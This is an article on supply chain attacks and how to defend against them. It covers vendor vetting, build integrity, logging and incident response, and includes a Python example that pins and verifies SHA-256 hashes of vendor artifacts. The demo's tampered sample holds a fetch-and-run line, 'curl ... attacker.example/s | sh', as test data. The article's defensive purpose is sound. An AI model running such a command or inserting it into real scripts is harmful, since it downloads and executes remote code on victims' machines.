Many people are a little shaky on just what a supply chain attack is. A supply chain attack occurs when an attacker compromises a trusted vendor, service provider or software product and then uses that trust relationship to attack your network. The exposure can come through service providers that have direct access to your network, or through compromised third-party software applications that you run on it. These kinds of attacks have been plaguing networks for years, but we’ve never seen the level and complexity of supply chain attacks we experienced last fall. And the problem is far from over; NIST expects these attacks are only likely to grow due to insufficient protection of software development and distribution channels, combined with the fact that other cyberattack paths are becoming more difficult to exploit.
So, what can you do now to get ready for more supply chain attacks? The first thing is to ensure that you have a strong vendor management program in place. Perform due diligence when choosing and implementing service providers and software providers / applications. Review their history to see if there are any past security incidents involving their services or applications. Review their information security program and confirm that they have strong controls in place. Review the results of vulnerability assessments, code reviews and penetration tests to see what problems were found and what was done to remediate them. And perform these checks on a regular basis, not just once.
When dealing with software providers, look into their code development, sharing and storage practices if possible. Do they protect the integrity of their code and build pipeline, for example by signing commits and releases, pinning and verifying the hashes of third-party dependencies, and scanning each build for malware before it is released? Do they use multifactor authentication to sign on to machines that have access to their codebase? Is access to coding projects based on least privilege / need-to-know, or does the whole development team have access to everything? If a vendor’s code development process is strong, they should have no problem sharing this information with you. It’s important to remember that when you hire a service provider or run a developer’s code on your network, you are essentially making them an integral part of your business, just like one of your regular employees. If your private information is compromised because of a vendor security failure, the ultimate responsibility for that compromise is on your shoulders, not theirs.
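The integrity checks that paragraph asks vendors about have a consumer-side counterpart you can run yourself before installing a third-party build: pin the SHA-256 of every artifact you have vetted and refuse anything that is unpinned or does not match. The following is example code written for this page, not the author’s or any vendor’s code. It assumes you record the digest once, at vetting time, from a copy you have reviewed; the artifact names, their bytes and the attacker.example URL are constructed for the demonstration.

```python
"""Consumer-side integrity check for third-party software artifacts.

Pin the SHA-256 of every vendor build you have vetted, and refuse to
install anything whose digest does not match, or which is not pinned at all.
"""
import hashlib
import hmac
from dataclasses import dataclass


@dataclass(frozen=True)
class VerifyResult:
    name: str
    ok: bool
    reason: str


def sha256_hex(data: bytes) -> str:
    """Digest of the artifact bytes exactly as they would be read from disk."""
    return hashlib.sha256(data).hexdigest()


def pin_artifact(name: str, data: bytes, manifest: dict) -> str:
    """Record the digest of an artifact at vetting time.

    Call this once, after the build has been reviewed, and never from the
    download path; otherwise the "pin" is simply whatever was shipped to you.
    """
    digest = sha256_hex(data)
    manifest[name] = digest
    return digest


def verify_artifact(name: str, data: bytes, manifest: dict) -> VerifyResult:
    """Fail closed: unknown artifacts and digest mismatches are both rejected."""
    expected = manifest.get(name)
    if expected is None:
        return VerifyResult(name, False, "not pinned: artifact was never vetted")
    actual = sha256_hex(data)
    # Constant-time comparison avoids leaking how much of the digest matched.
    if not hmac.compare_digest(expected, actual):
        return VerifyResult(
            name, False,
            f"digest mismatch: expected {expected[:12]}..., got {actual[:12]}...",
        )
    return VerifyResult(name, True, "digest matches pinned value")


# Constructed sample artifacts for the demo (not real vendor releases).
VETTED_BUILD = b"#!/bin/sh\necho 'vendor agent 1.4.2'\n"
# Same build with a payload appended after vetting; attacker.example is a placeholder.
TAMPERED_BUILD = VETTED_BUILD + b"curl -s http://attacker.example/s | sh\n"


def demo() -> dict:
    """Pin the vetted build, then check a clean copy, a tampered copy and an unpinned name."""
    manifest: dict = {}
    pin_artifact("vendor-agent-1.4.2.sh", VETTED_BUILD, manifest)
    return {
        "clean": verify_artifact("vendor-agent-1.4.2.sh", VETTED_BUILD, manifest),
        "tampered": verify_artifact("vendor-agent-1.4.2.sh", TAMPERED_BUILD, manifest),
        "unpinned": verify_artifact("vendor-agent-1.5.0.sh", VETTED_BUILD, manifest),
    }


if __name__ == "__main__":
    for label, result in demo().items():
        print(f"{label:9s} ok={result.ok}  {result.reason}")
```

Two caveats worth keeping in mind. A pinned hash only catches tampering that happens after you vetted the build; if the vendor’s own build pipeline was compromised before release, the malicious build is what you pinned, which is exactly why the vendor-side questions above matter. And where the vendor signs releases, verifying that signature against a key you obtained out of band is the stronger form of this check; the hash pin is the minimum you can do with no vendor cooperation at all.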
You should also ensure that you and your vendors have strong security monitoring and incident response programs in place. Logging on your network should be verbose, and enabled on every device and application that is capable of it. In addition, those logs need to be aggregated, parsed and examined by qualified human analysts, with particular attention to the accounts and connections your vendors use. And if a compromise of the supply chain occurs, you should have incident response plans in place so you can react quickly and correctly. Practice the plan and be sure to incorporate lessons learned so that improvement is constant. Doing all of these things is not the whole answer, but it will give your organization a good start in dealing with the supply chain security problem.